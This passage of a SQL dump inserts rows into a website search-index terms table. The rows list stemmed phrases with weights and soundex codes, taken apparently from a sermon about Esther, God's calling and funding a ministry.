(327372, 'for giving her', 'for giving her', 0, 1, 1.4667, 'F621526', 1, '*'),
(327373, 'for her', 'for her', 0, 1, 1.2333, 'F600', 1, '*'),
(327374, 'for her ministry', 'for her ministry', 0, 1, 1.5333, 'F65236', 1, '*'),
(327375, 'for her to', 'for her to', 0, 1, 1.3333, 'F630', 1, '*'),
(327376, 'for him if', 'for him if', 0, 1, 1.3333, 'F651', 1, '*'),
(327377, 'for jesus to', 'for jesus to', 0, 1, 1.4, 'F623', 1, '*'),
(327378, 'for joseph', 'for joseph', 0, 1, 1.3333, 'F621', 1, '*'),
(327379, 'for joseph a', 'for joseph a', 0, 1, 1.4, 'F621', 1, '*'),
(327380, 'for mary', 'for mary', 0, 1, 1.2667, 'F656', 1, '*'),
(327381, 'for mary to', 'for mary to', 0, 1, 1.3667, 'F6563', 1, '*'),
(327382, 'for me this', 'for me this', 0, 1, 1.3667, 'F6532', 1, '*'),
(327383, 'for my', 'for my', 0, 1, 1.2, 'F650', 1, '*'),
(327384, 'for my life', 'for my life', 0, 1, 1.3667, 'F6541', 1, '*'),
(327385, 'for the wealth', 'for the wealth', 0, 1, 1.4667, 'F6343', 1, '*'),
(327386, 'for this hour', 'for this hour', 0, 1, 1.4333, 'F6326', 1, '*'),
(327387, 'for you a', 'for you a', 0, 1, 1.3, 'F600', 1, '*'),
(327388, 'for you as', 'for you as', 0, 1, 1.3333, 'F620', 1, '*'),
(327389, 'forget', 'forget', 0, 0, 0.4, 'F623', 1, '*'),
(327390, 'forget that', 'forget that', 0, 1, 1.3667, 'F623', 1, '*'),
(327391, 'forget that god', 'forget that god', 0, 1, 1.5, 'F62323', 1, '*'),
(327392, 'from every other', 'from every other', 0, 1, 1.5333, 'F651636', 1, '*'),
(327393, 'from one another', 'from one another', 0, 1, 1.5333, 'F6536', 1, '*'),
(327394, 'fuel', 'fuel', 0, 0, 0.2667, 'F400', 1, '*'),
(327395, 'fuel and', 'fuel and', 0, 1, 1.2667, 'F453', 1, '*'),
(327396, 'fuel and service', 'fuel and service', 0, 1, 1.5333, 'F4532612', 1, '*'),
(327397, 'fulfill his calling', 'fulfil his calling', 0, 1, 1.6333, 'F4142452', 1, '*'),
(327398, 'funds', 'fund', 0, 0, 0.3333, 'F532', 1, '*'),
(327399, 'funds god', 'fund god', 0, 1, 1.3, 'F5323', 1, '*'),
(327400, 'funds god funds', 'fund god funds', 0, 1, 1.5, 'F53231532', 1, '*'),
(327401, 'funds the', 'fund the', 0, 1, 1.3, 'F5323', 1, '*'),
(327402, 'funds the assignment', 'fund the assignment', 0, 1, 1.6667, 'F5323253', 1, '*'),
(327403, 'gave him', 'gave him', 0, 1, 1.2667, 'G150', 1, '*'),
(327404, 'gave him his', 'gave him his', 0, 1, 1.4, 'G152', 1, '*'),
(327405, 'generational consequences', 'gener consequences', 0, 1, 1.8333, 'G5635425252', 1, '*'),
(327406, 'generational consequences all', 'gener consequences all', 0, 1, 1.9667, 'G56354252524', 1, '*'),
(327407, 'get money', 'get money', 0, 1, 1.3, 'G350', 1, '*'),
(327408, 'get money to', 'get money to', 0, 1, 1.4, 'G353', 1, '*'),
(327409, 'girl', 'girl', 0, 0, 0.2667, 'G640', 1, '*'),
(327410, 'girl of', 'girl of', 0, 1, 1.2333, 'G641', 1, '*'),
(327411, 'girl of her', 'girl of her', 0, 1, 1.3667, 'G6416', 1, '*'),
(327412, 'give her', 'give her', 0, 1, 1.2667, 'G160', 1, '*'),
(327413, 'give her 130,000', 'give her 130,000', 0, 1, 1.5333, 'G160', 1, '*'),
(327414, 'give me', 'give me', 0, 1, 1.2333, 'G150', 1, '*'),
(327415, 'give me a', 'give me a', 0, 1, 1.3, 'G150', 1, '*'),
(327416, 'gives us that', 'give us that', 0, 1, 1.4333, 'G123', 1, '*'),
(327417, 'giving her', 'give her', 0, 1, 1.3333, 'G1526', 1, '*'),
(327418, 'giving her the', 'give her the', 0, 1, 1.4667, 'G15263', 1, '*'),
(327419, 'go with', 'go with', 0, 1, 1.2333, 'G300', 1, '*'),
(327420, 'go with your', 'go with your', 0, 1, 1.4, 'G360', 1, '*'),
(327421, 'god called', 'god called', 0, 1, 1.3333, 'G3243', 1, '*'),
(327422, 'god called me', 'god called me', 0, 1, 1.4333, 'G32435', 1, '*'),
(327423, 'god called you', 'god called you', 0, 1, 1.4667, 'G3243', 1, '*'),
(327424, 'god except the', 'god except the', 0, 1, 1.4667, 'G3213', 1, '*'),
(327425, 'god for giving', 'god for giving', 0, 1, 1.4667, 'G3162152', 1, '*'),
(327426, 'god funds', 'god funds', 0, 1, 1.3, 'G31532', 1, '*'),
(327427, 'god funds god', 'god funds god', 0, 1, 1.4333, 'G315323', 1, '*'),
(327428, 'god funds the', 'god funds the', 0, 1, 1.4333, 'G315323', 1, '*'),
(327429, 'god god made', 'god god made', 0, 1, 1.4, 'G32353', 1, '*'),
(327430, 'god guided', 'god guided', 0, 1, 1.3333, 'G323', 1, '*'),
(327431, 'god guided your', 'god guided your', 0, 1, 1.5, 'G3236', 1, '*'),
(327432, 'god had an', 'god had an', 0, 1, 1.3333, 'G350', 1, '*'),
(327433, 'god has an', 'god has an', 0, 1, 1.3333, 'G325', 1, '*'),
(327434, 'god is interested', 'god is interested', 0, 1, 1.5667, 'G3253623', 1, '*'),
(327435, 'god is to', 'god is to', 0, 1, 1.3, 'G323', 1, '*'),
(327436, 'god is watching', 'god is watching', 0, 1, 1.5, 'G323252', 1, '*'),
(327437, 'god made esther', 'god made esther', 0, 1, 1.5, 'G353236', 1, '*'),
(327438, 'god must know', 'god must know', 0, 1, 1.4333, 'G352325', 1, '*'),
(327439, 'god ordered', 'god ordered', 0, 1, 1.3667, 'G36363', 1, '*'),
(327440, 'god ordered that', 'god ordered that', 0, 1, 1.5333, 'G36363', 1, '*'),
(327441, 'god planned', 'god planned', 0, 1, 1.3667, 'G31453', 1, '*'),
(327442, 'god planned for', 'god planned for', 0, 1, 1.5, 'G3145316', 1, '*'),
(327443, 'god raised', 'god raised', 0, 1, 1.3333, 'G3623', 1, '*'),
(327444, 'god raised him', 'god raised him', 0, 1, 1.4667, 'G36235', 1, '*'),
(327445, 'god said', 'god said', 0, 1, 1.2667, 'G323', 1, '*'),
(327446, 'god said i', 'god said i', 0, 1, 1.3333, 'G323', 1, '*'),
(327447, 'god that was', 'god that was', 0, 1, 1.4, 'G320', 1, '*'),
(327448, 'god there are', 'god there are', 0, 1, 1.4333, 'G360', 1, '*'),
(327449, 'god will bring', 'god will bring', 0, 1, 1.4667, 'G341652', 1, '*'),
(327450, 'god will promote', 'god will promote', 0, 1, 1.5333, 'G341653', 1, '*'),
(327451, 'god will send', 'god will send', 0, 1, 1.4333, 'G34253', 1, '*'),
(327452, 'god would give', 'god would give', 0, 1, 1.4667, 'G34321', 1, '*'),
(327453, 'god\'s people it', 'god people it', 0, 1, 1.5, 'G32143', 1, '*'),
(327454, 'going it\'s', 'go it', 0, 1, 1.3333, 'G5232', 1, '*'),
(327455, 'going it\'s a', 'go it a', 0, 1, 1.4, 'G5232', 1, '*'),
(327456, 'going to tell', 'go to tell', 0, 1, 1.4333, 'G5234', 1, '*'),
(327457, 'going to use', 'go to use', 0, 1, 1.4, 'G5232', 1, '*'),
(327458, 'got a', 'got a', 0, 1, 1.1667, 'G300', 1, '*'),
(327459, 'got a helicopter', 'got a helicopter', 0, 1, 1.5333, 'G342136', 1, '*'),
(327460, 'governor', 'governor', 0, 0, 0.5333, 'G1656', 1, '*'),
(327461, 'governor a', 'governor a', 0, 1, 1.3333, 'G1656', 1, '*'),
(327462, 'governor a president', 'governor a president', 0, 1, 1.6667, 'G1656162353', 1, '*'),
(327463, 'grow up in', 'grow up in', 0, 1, 1.3333, 'G615', 1, '*'),
(327464, 'grows the', 'grow the', 0, 1, 1.3, 'G623', 1, '*'),
(327465, 'grows the capacity', 'grow the capacity', 0, 1, 1.6, 'G6232123', 1, '*'),
(327466, 'guided', 'guid', 0, 0, 0.4, 'G300', 1, '*'),
(327467, 'guided your', 'guid your', 0, 1, 1.3667, 'G360', 1, '*'),
(327468, 'guided your steps', 'guid your steps', 0, 1, 1.5667, 'G362312', 1, '*'),
(327469, 'had an assignment', 'had an assignment', 0, 1, 1.5667, 'H35253', 1, '*'),
(327470, 'had that', 'had that', 0, 1, 1.2667, 'H300', 1, '*'),
(327471, 'had that gave', 'had that gave', 0, 1, 1.4333, 'H321', 1, '*'),
(327472, 'had then', 'had then', 0, 1, 1.2667, 'H350', 1, '*'),
(327473, 'had then if', 'had then if', 0, 1, 1.3667, 'H351', 1, '*'),
(327474, 'had to become', 'had to become', 0, 1, 1.4333, 'H3125', 1, '*'),
(327475, 'haman\'s', 'haman', 0, 0, 0.4667, 'H520', 1, '*'),
(327476, 'haman\'s plot', 'haman plot', 0, 1, 1.4, 'H52143', 1, '*'),
(327477, 'haman\'s plot and', 'haman plot and', 0, 1, 1.5333, 'H5214353', 1, '*'),
(327478, 'hand of a', 'hand of a', 0, 1, 1.3, 'H531', 1, '*'),
(327479, 'handle relationships', 'handl relationships', 0, 1, 1.6667, 'H5346435212', 1, '*'),
(327480, 'handle relationships because', 'handl relationships because', 0, 1, 1.9333, 'H534643521212', 1, '*'),
(327481, 'handle relationships in', 'handl relationships in', 0, 1, 1.7667, 'H53464352125', 1, '*'),
(327482, 'has an assignment', 'ha an assignment', 0, 1, 1.5667, 'H25253', 1, '*'),
(327483, 'has never been', 'ha never been', 0, 1, 1.4667, 'H251615', 1, '*'),
(327484, 'have an account', 'have an account', 0, 1, 1.5, 'H15253', 1, '*'),
(327485, 'have any', 'have any', 0, 1, 1.2667, 'H150', 1, '*'),
(327486, 'have any problem', 'have any problem', 0, 1, 1.5333, 'H1516145', 1, '*'),
(327487, 'have become the', 'have become the', 0, 1, 1.5, 'H1253', 1, '*'),
(327488, 'have been prepared', 'have been prepared', 0, 1, 1.6, 'H1516163', 1, '*'),
(327489, 'have been to', 'have been to', 0, 1, 1.4, 'H153', 1, '*'),
(327490, 'have but another', 'have but another', 0, 1, 1.5333, 'H13536', 1, '*'),
(327491, 'have generational', 'have generational', 0, 1, 1.5667, 'H1256354', 1, '*'),
(327492, 'have generational consequences', 'have generational consequences', 0, 1, 2, 'H125635425252', 1, '*'),
(327493, 'have how', 'have how', 0, 1, 1.2667, 'H100', 1, '*'),
(327494, 'have how strong', 'have how strong', 0, 1, 1.5, 'H123652', 1, '*'),
(327495, 'have if', 'have if', 0, 1, 1.2333, 'H100', 1, '*'),
(327496, 'have if your', 'have if your', 0, 1, 1.4, 'H160', 1, '*'),
(327497, 'have not knowingly', 'have not knowingly', 0, 1, 1.6, 'H1532524', 1, '*'),
(327498, 'have operated', 'have operated', 0, 1, 1.4333, 'H163', 1, '*'),
(327499, 'have operated these', 'have operated these', 0, 1, 1.6333, 'H1632', 1, '*'),
(327500, 'have that', 'have that', 0, 1, 1.3, 'H130', 1, '*'),
(327501, 'have that account', 'have that account', 0, 1, 1.5667, 'H13253', 1, '*'),
(327502, 'have the clout', 'have the clout', 0, 1, 1.4667, 'H13243', 1, '*'),
(327503, 'have to learn', 'have to learn', 0, 1, 1.4333, 'H13465', 1, '*'),
(327504, 'have to look', 'have to look', 0, 1, 1.4, 'H1342', 1, '*'),
(327505, 'have to nurture', 'have to nurture', 0, 1, 1.5, 'H135636', 1, '*'),
(327506, 'have wrong', 'have wrong', 0, 1, 1.3333, 'H1652', 1, '*'),
(327507, 'have wrong purposes', 'have wrong purposes', 0, 1, 1.6333, 'H16521612', 1, '*'),
(327508, 'he commits', 'he commits', 0, 1, 1.3333, 'H2532', 1, '*'),
(327509, 'he commits to', 'he commits to', 0, 1, 1.4333, 'H25323', 1, '*'),
(327510, 'he could enter', 'he could enter', 0, 1, 1.4667, 'H243536', 1, '*'),
(327511, 'he could fulfill', 'he could fulfill', 0, 1, 1.5333, 'H2431414', 1, '*'),
(327512, 'he displaced', 'he displaced', 0, 1, 1.4, 'H321423', 1, '*'),
(327513, 'he displaced vashti', 'he displaced vashti', 0, 1, 1.6333, 'H321423123', 1, '*'),
(327514, 'he gives us', 'he gives us', 0, 1, 1.3667, 'H212', 1, '*'),
(327515, 'he had an', 'he had an', 0, 1, 1.3, 'H350', 1, '*'),
(327516, 'he is concerned', 'he is concerned', 0, 1, 1.5, 'H252653', 1, '*'),
(327517, 'he isgoing', 'he isgoing', 0, 1, 1.3333, 'H252', 1, '*'),
(327518, 'he isgoing to', 'he isgoing to', 0, 1, 1.4333, 'H2523', 1, '*'),
(327519, 'he tells', 'he tells', 0, 1, 1.2667, 'H342', 1, '*'),
(327520, 'he tells us', 'he tells us', 0, 1, 1.3667, 'H342', 1, '*'),
(327521, 'he tells you', 'he tells you', 0, 1, 1.4, 'H342', 1, '*'),
(327522, 'helicopter', 'helicopt', 0, 0, 0.6667, 'H42136', 1, '*'),
(327523, 'helicopter god', 'helicopt god', 0, 1, 1.4667, 'H4213623', 1, '*'),
(327524, 'helicopter god will', 'helicopt god will', 0, 1, 1.6333, 'H42136234', 1, '*'),
(327525, 'helicopter i', 'helicopt i', 0, 1, 1.4, 'H42136', 1, '*'),
(327526, 'helicopter i was', 'helicopt i was', 0, 1, 1.5333, 'H421362', 1, '*'),
(327527, 'helicopter in', 'helicopt in', 0, 1, 1.4333, 'H421365', 1, '*'),
(327528, 'helicopter in return', 'helicopt in return', 0, 1, 1.6667, 'H4213656365', 1, '*'),
(327529, 'helicopter when', 'helicopt when', 0, 1, 1.5, 'H421365', 1, '*'),
(327530, 'helicopter when you', 'helicopt when you', 0, 1, 1.6333, 'H421365', 1, '*'),
(327531, 'helicopter where', 'helicopt where', 0, 1, 1.5333, 'H42136', 1, '*'),
(327532, 'helicopter where will', 'helicopt where will', 0, 1, 1.7, 'H421364', 1, '*'),
(327533, 'help my', 'help my', 0, 1, 1.2333, 'H415', 1, '*'),
(327534, 'help my ministry', 'help my ministry', 0, 1, 1.5333, 'H415236', 1, '*'),
(327535, 'her 130,000', 'her 130,000', 0, 1, 1.3667, 'H600', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(327536, 'her 130,000 to', 'her 130,000 to', 0, 1, 1.4667, 'H630', 1, '*'),
(327537, 'her being', 'her being', 0, 1, 1.3, 'H6152', 1, '*'),
(327538, 'her being at', 'her being at', 0, 1, 1.4, 'H61523', 1, '*'),
(327539, 'her for', 'her for', 0, 1, 1.2333, 'H616', 1, '*'),
(327540, 'her for for', 'her for for', 0, 1, 1.3667, 'H61616', 1, '*'),
(327541, 'her in', 'her in', 0, 1, 1.2, 'H650', 1, '*'),
(327542, 'her in the', 'her in the', 0, 1, 1.3333, 'H653', 1, '*'),
(327543, 'her ministry', 'her ministry', 0, 1, 1.4, 'H65236', 1, '*'),
(327544, 'her ministry she', 'her ministry she', 0, 1, 1.5333, 'H652362', 1, '*'),
(327545, 'her the', 'her the', 0, 1, 1.2333, 'H630', 1, '*'),
(327546, 'her the throne', 'her the throne', 0, 1, 1.4667, 'H6365', 1, '*'),
(327547, 'her time for', 'her time for', 0, 1, 1.4, 'H63516', 1, '*'),
(327548, 'her to', 'her to', 0, 1, 1.2, 'H630', 1, '*'),
(327549, 'her to have', 'her to have', 0, 1, 1.3667, 'H631', 1, '*'),
(327550, 'here on', 'here on', 0, 1, 1.2333, 'H650', 1, '*'),
(327551, 'here on earth', 'here on earth', 0, 1, 1.4333, 'H6563', 1, '*'),
(327552, 'here to', 'here to', 0, 1, 1.2333, 'H630', 1, '*'),
(327553, 'here to go', 'here to go', 0, 1, 1.3333, 'H632', 1, '*'),
(327554, 'him her', 'him her', 0, 1, 1.2333, 'H560', 1, '*'),
(327555, 'him her for', 'him her for', 0, 1, 1.3667, 'H5616', 1, '*'),
(327556, 'him his victory', 'him his victory', 0, 1, 1.5, 'H521236', 1, '*'),
(327557, 'him if', 'him if', 0, 1, 1.2, 'H510', 1, '*'),
(327558, 'him if god', 'him if god', 0, 1, 1.3333, 'H5123', 1, '*'),
(327559, 'his calling', 'hi calling', 0, 1, 1.3667, 'H2452', 1, '*'),
(327560, 'his calling every', 'hi calling every', 0, 1, 1.5667, 'H245216', 1, '*'),
(327561, 'his plan', 'hi plan', 0, 1, 1.2667, 'H2145', 1, '*'),
(327562, 'his plan for', 'hi plan for', 0, 1, 1.4, 'H214516', 1, '*'),
(327563, 'his purpose for', 'hi purpose for', 0, 1, 1.5, 'H2161216', 1, '*'),
(327564, 'his victory', 'hi victory', 0, 1, 1.3667, 'H21236', 1, '*'),
(327565, 'his victory not', 'hi victory not', 0, 1, 1.5, 'H2123653', 1, '*'),
(327566, 'home atmosphere', 'home atmosphere', 0, 1, 1.5, 'H535216', 1, '*'),
(327567, 'home atmosphere where', 'home atmosphere where', 0, 1, 1.7, 'H535216', 1, '*'),
(327568, 'hour this', 'hour this', 0, 1, 1.3, 'H632', 1, '*'),
(327569, 'hour this is', 'hour this is', 0, 1, 1.4, 'H632', 1, '*'),
(327570, 'housewife god', 'housewif god', 0, 1, 1.4333, 'H2123', 1, '*'),
(327571, 'housewife god had', 'housewif god had', 0, 1, 1.5667, 'H2123', 1, '*'),
(327572, 'housewife god has', 'housewif god has', 0, 1, 1.5667, 'H21232', 1, '*'),
(327573, 'how does', 'how does', 0, 1, 1.2667, 'H320', 1, '*'),
(327574, 'how does that', 'how does that', 0, 1, 1.4333, 'H323', 1, '*'),
(327575, 'how god guided', 'how god guided', 0, 1, 1.4667, 'H2323', 1, '*'),
(327576, 'how people', 'how people', 0, 1, 1.3333, 'H140', 1, '*'),
(327577, 'how people think', 'how people think', 0, 1, 1.5333, 'H14352', 1, '*'),
(327578, 'how strong', 'how strong', 0, 1, 1.3333, 'H23652', 1, '*'),
(327579, 'how strong is', 'how strong is', 0, 1, 1.4333, 'H23652', 1, '*'),
(327580, 'how they handle', 'how they handle', 0, 1, 1.5, 'H3534', 1, '*'),
(327581, 'how to handle', 'how to handle', 0, 1, 1.4333, 'H3534', 1, '*'),
(327582, 'how to manage', 'how to manage', 0, 1, 1.4333, 'H352', 1, '*'),
(327583, 'human body', 'human body', 0, 1, 1.3333, 'H513', 1, '*'),
(327584, 'human body anointing', 'human body anointing', 0, 1, 1.6667, 'H5135352', 1, '*'),
(327585, 'i am currently', 'i am currently', 0, 1, 1.4667, 'I526534', 1, '*'),
(327586, 'i d', 'i d', 0, 1, 1.1, 'I300', 1, '*'),
(327587, 'i d e', 'i d e', 0, 1, 1.1667, 'I300', 1, '*'),
(327588, 'i get', 'i get', 0, 1, 1.1667, 'I230', 1, '*'),
(327589, 'i get money', 'i get money', 0, 1, 1.3667, 'I235', 1, '*'),
(327590, 'i got a', 'i got a', 0, 1, 1.2333, 'I230', 1, '*'),
(327591, 'i had then', 'i had then', 0, 1, 1.3333, 'I350', 1, '*'),
(327592, 'i have operated', 'i have operated', 0, 1, 1.5, 'I163', 1, '*'),
(327593, 'i mentor', 'i mentor', 0, 1, 1.2667, 'I536', 1, '*'),
(327594, 'i mentor you.”', 'i mentor you.”', 0, 1, 1.4667, 'I536', 1, '*'),
(327595, 'i park', 'i park', 0, 1, 1.2, 'I162', 1, '*'),
(327596, 'i park the', 'i park the', 0, 1, 1.3333, 'I1623', 1, '*'),
(327597, 'i should give', 'i should give', 0, 1, 1.4333, 'I24321', 1, '*'),
(327598, 'i should sell', 'i should sell', 0, 1, 1.4333, 'I24324', 1, '*'),
(327599, 'i sold', 'i sold', 0, 1, 1.2, 'I243', 1, '*'),
(327600, 'i sold my', 'i sold my', 0, 1, 1.3, 'I2435', 1, '*'),
(327601, 'i start', 'i start', 0, 1, 1.2333, 'I2363', 1, '*'),
(327602, 'i start to', 'i start to', 0, 1, 1.3333, 'I2363', 1, '*'),
(327603, 'i was clear', 'i was clear', 0, 1, 1.3667, 'I246', 1, '*'),
(327604, 'i was using', 'i was using', 0, 1, 1.3667, 'I252', 1, '*'),
(327605, 'i\'m not', 'i not', 0, 1, 1.2333, 'I530', 1, '*'),
(327606, 'i\'m not sure', 'i not sure', 0, 1, 1.4, 'I5326', 1, '*'),
(327607, 'idea of', 'idea of', 0, 1, 1.2333, 'I310', 1, '*'),
(327608, 'idea of what', 'idea of what', 0, 1, 1.4, 'I313', 1, '*'),
(327609, 'if god', 'if god', 0, 1, 1.2, 'I123', 1, '*'),
(327610, 'if god called', 'if god called', 0, 1, 1.4333, 'I123243', 1, '*'),
(327611, 'if god is', 'if god is', 0, 1, 1.3, 'I1232', 1, '*'),
(327612, 'if i got', 'if i got', 0, 1, 1.2667, 'I123', 1, '*'),
(327613, 'if i sold', 'if i sold', 0, 1, 1.3, 'I1243', 1, '*'),
(327614, 'if my', 'if my', 0, 1, 1.1667, 'I150', 1, '*'),
(327615, 'if my ministry', 'if my ministry', 0, 1, 1.4667, 'I15236', 1, '*'),
(327616, 'if your faith', 'if your faith', 0, 1, 1.4333, 'I1613', 1, '*'),
(327617, 'important because everybody', 'import because everybody', 0, 1, 1.9, 'I516353121613', 1, '*'),
(327618, 'important that we', 'import that we', 0, 1, 1.5667, 'I516353', 1, '*'),
(327619, 'in an official', 'in an official', 0, 1, 1.4667, 'I5124', 1, '*'),
(327620, 'in each', 'in each', 0, 1, 1.2333, 'I520', 1, '*'),
(327621, 'in each of', 'in each of', 0, 1, 1.3333, 'I521', 1, '*'),
(327622, 'in error', 'in error', 0, 1, 1.2667, 'I560', 1, '*'),
(327623, 'in error once', 'in error once', 0, 1, 1.4333, 'I5652', 1, '*'),
(327624, 'in essence', 'in essence', 0, 1, 1.3333, 'I5252', 1, '*'),
(327625, 'in essence saying', 'in essence saying', 0, 1, 1.5667, 'I525252', 1, '*'),
(327626, 'in making', 'in making', 0, 1, 1.3, 'I5252', 1, '*'),
(327627, 'in making you', 'in making you', 0, 1, 1.4333, 'I5252', 1, '*'),
(327628, 'in people\'s', 'in people', 0, 1, 1.3667, 'I5142', 1, '*'),
(327629, 'in people\'s life', 'in people life', 0, 1, 1.5333, 'I514241', 1, '*'),
(327630, 'in return', 'in return', 0, 1, 1.3, 'I56365', 1, '*'),
(327631, 'in return you', 'in return you', 0, 1, 1.4333, 'I56365', 1, '*'),
(327632, 'in the disciplines', 'in the disciplines', 0, 1, 1.6, 'I5321452', 1, '*'),
(327633, 'in the hand', 'in the hand', 0, 1, 1.3667, 'I5353', 1, '*'),
(327634, 'in their life', 'in their life', 0, 1, 1.4333, 'I53641', 1, '*'),
(327635, 'in their suffering', 'in their suffering', 0, 1, 1.6, 'I53621652', 1, '*'),
(327636, 'in this 36th', 'in this 36th', 0, 1, 1.4, 'I5323', 1, '*'),
(327637, 'in those accounts', 'in those accounts', 0, 1, 1.5667, 'I532532', 1, '*'),
(327638, 'in when', 'in when', 0, 1, 1.2333, 'I500', 1, '*'),
(327639, 'in when people', 'in when people', 0, 1, 1.4667, 'I514', 1, '*'),
(327640, 'increasing when', 'increas when', 0, 1, 1.5, 'I5262525', 1, '*'),
(327641, 'increasing when your', 'increas when your', 0, 1, 1.6667, 'I52625256', 1, '*'),
(327642, 'instructions in', 'instruct in', 0, 1, 1.5, 'I523623525', 1, '*'),
(327643, 'instructions in those', 'instruct in those', 0, 1, 1.7, 'I52362352532', 1, '*'),
(327644, 'interact', 'interact', 0, 0, 0.5333, 'I53623', 1, '*'),
(327645, 'interact beyond', 'interact beyond', 0, 1, 1.5, 'I53623153', 1, '*'),
(327646, 'interact beyond your', 'interact beyond your', 0, 1, 1.6667, 'I536231536', 1, '*'),
(327647, 'interact with', 'interact with', 0, 1, 1.4333, 'I53623', 1, '*'),
(327648, 'interact with the', 'interact with the', 0, 1, 1.5667, 'I53623', 1, '*'),
(327649, 'interested', 'interest', 0, 0, 0.6667, 'I53623', 1, '*'),
(327650, 'interested in', 'interest in', 0, 1, 1.4333, 'I536235', 1, '*'),
(327651, 'interested in making', 'interest in making', 0, 1, 1.6667, 'I536235252', 1, '*'),
(327652, 'interested in their', 'interest in their', 0, 1, 1.6333, 'I53623536', 1, '*'),
(327653, 'ionshi', 'ionshi', 0, 0, 0.4, 'I520', 1, '*'),
(327654, 'ionshi p', 'ionshi p', 0, 1, 1.2667, 'I521', 1, '*'),
(327655, 'ionshi p account', 'ionshi p account', 0, 1, 1.5333, 'I521253', 1, '*'),
(327656, 'is ability', 'is ability', 0, 1, 1.3333, 'I2143', 1, '*'),
(327657, 'is ability to', 'is ability to', 0, 1, 1.4333, 'I2143', 1, '*'),
(327658, 'is concerned', 'is concerned', 0, 1, 1.4, 'I252653', 1, '*'),
(327659, 'is concerned with', 'is concerned with', 0, 1, 1.5667, 'I252653', 1, '*'),
(327660, 'is his purpose', 'is his purpose', 0, 1, 1.4667, 'I21612', 1, '*'),
(327661, 'is how they', 'is how they', 0, 1, 1.3667, 'I230', 1, '*'),
(327662, 'is in each', 'is in each', 0, 1, 1.3333, 'I252', 1, '*'),
(327663, 'is interested', 'is interested', 0, 1, 1.4333, 'I253623', 1, '*'),
(327664, 'is interested in', 'is interested in', 0, 1, 1.5333, 'I2536235', 1, '*'),
(327665, 'is low you', 'is low you', 0, 1, 1.3333, 'I240', 1, '*'),
(327666, 'is my divine', 'is my divine', 0, 1, 1.4, 'I25315', 1, '*'),
(327667, 'is no divine', 'is no divine', 0, 1, 1.4, 'I25315', 1, '*'),
(327668, 'is not going', 'is not going', 0, 1, 1.4, 'I253252', 1, '*'),
(327669, 'is small', 'is small', 0, 1, 1.2667, 'I254', 1, '*'),
(327670, 'is small or', 'is small or', 0, 1, 1.3667, 'I2546', 1, '*'),
(327671, 'is the manifestation', 'is the manifestation', 0, 1, 1.6667, 'I2351235', 1, '*'),
(327672, 'is the meaning', 'is the meaning', 0, 1, 1.4667, 'I2352', 1, '*'),
(327673, 'is the reason', 'is the reason', 0, 1, 1.4333, 'I23625', 1, '*'),
(327674, 'is the strength', 'is the strength', 0, 1, 1.5, 'I23236523', 1, '*'),
(327675, 'is very', 'is very', 0, 1, 1.2333, 'I216', 1, '*'),
(327676, 'is very important', 'is very important', 0, 1, 1.5667, 'I216516353', 1, '*'),
(327677, 'is watching it', 'is watching it', 0, 1, 1.4667, 'I232523', 1, '*'),
(327678, 'is wise', 'is wise', 0, 1, 1.2333, 'I200', 1, '*'),
(327679, 'is wise wisdom', 'is wise wisdom', 0, 1, 1.4667, 'I235', 1, '*'),
(327680, 'is your relationship', 'is your relationship', 0, 1, 1.6667, 'I2643521', 1, '*'),
(327681, 'isdom', 'isdom', 0, 0, 0.3333, 'I235', 1, '*'),
(327682, 'isdom account', 'isdom account', 0, 1, 1.4333, 'I235253', 1, '*'),
(327683, 'isdom account it', 'isdom account it', 0, 1, 1.5333, 'I235253', 1, '*'),
(327684, 'isgoing', 'isgo', 0, 0, 0.4667, 'I252', 1, '*'),
(327685, 'isgoing to', 'isgo to', 0, 1, 1.3333, 'I2523', 1, '*'),
(327686, 'isgoing to look', 'isgo to look', 0, 1, 1.5, 'I252342', 1, '*'),
(327687, 'israel would', 'israel would', 0, 1, 1.4, 'I2643', 1, '*'),
(327688, 'israel would have', 'israel would have', 0, 1, 1.5667, 'I26431', 1, '*'),
(327689, 'it and once', 'it and once', 0, 1, 1.3667, 'I35352', 1, '*'),
(327690, 'it is small', 'it is small', 0, 1, 1.3667, 'I3254', 1, '*'),
(327691, 'it is very', 'it is very', 0, 1, 1.3333, 'I3216', 1, '*'),
(327692, 'it mordecai', 'it mordecai', 0, 1, 1.3667, 'I35632', 1, '*'),
(327693, 'it mordecai said', 'it mordecai said', 0, 1, 1.5333, 'I356323', 1, '*'),
(327694, 'it takes faith', 'it takes faith', 0, 1, 1.4667, 'I3213', 1, '*'),
(327695, 'it was a', 'it was a', 0, 1, 1.2667, 'I320', 1, '*'),
(327696, 'it whether', 'it whether', 0, 1, 1.3333, 'I360', 1, '*'),
(327697, 'it whether you', 'it whether you', 0, 1, 1.4667, 'I360', 1, '*'),
(327698, 'it\'s a process', 'it a process', 0, 1, 1.4667, 'I32162', 1, '*'),
(327699, 'it\'s amazing', 'it amazing', 0, 1, 1.4, 'I325252', 1, '*'),
(327700, 'it\'s amazing how', 'it amazing how', 0, 1, 1.5333, 'I325252', 1, '*'),
(327701, 'item 62', 'item 62', 0, 1, 1.2333, 'I350', 1, '*'),
(327702, 'item 62 living', 'item 62 living', 0, 1, 1.4667, 'I354152', 1, '*'),
(327703, 'jesus christ your', 'jesu christ your', 0, 1, 1.5667, 'J6236', 1, '*'),
(327704, 'jesus could', 'jesu could', 0, 1, 1.3667, 'J430', 1, '*'),
(327705, 'jesus could grow', 'jesu could grow', 0, 1, 1.5333, 'J4326', 1, '*'),
(327706, 'jewish', 'jewish', 0, 0, 0.4, 'J000', 1, '*'),
(327707, 'jewish religion', 'jewish religion', 0, 1, 1.5, 'J6425', 1, '*'),
(327708, 'jewish religion so', 'jewish religion so', 0, 1, 1.6, 'J64252', 1, '*'),
(327709, 'job god', 'job god', 0, 1, 1.2333, 'J123', 1, '*'),
(327710, 'job god will', 'job god will', 0, 1, 1.4, 'J1234', 1, '*'),
(327711, 'job supernaturally', 'job supernaturally', 0, 1, 1.6, 'J12165364', 1, '*'),
(327712, 'job supernaturally and', 'job supernaturally and', 0, 1, 1.7333, 'J1216536453', 1, '*'),
(327713, 'joseph a', 'joseph a', 0, 1, 1.2667, 'J100', 1, '*'),
(327714, 'joseph a businessman', 'joseph a businessman', 0, 1, 1.6667, 'J12525', 1, '*'),
(327715, 'journey and how', 'journei and how', 0, 1, 1.5, 'J653', 1, '*'),
(327716, 'just interested', 'just interested', 0, 1, 1.5, 'J353623', 1, '*'),
(327717, 'just interested in', 'just interested in', 0, 1, 1.6, 'J3536235', 1, '*'),
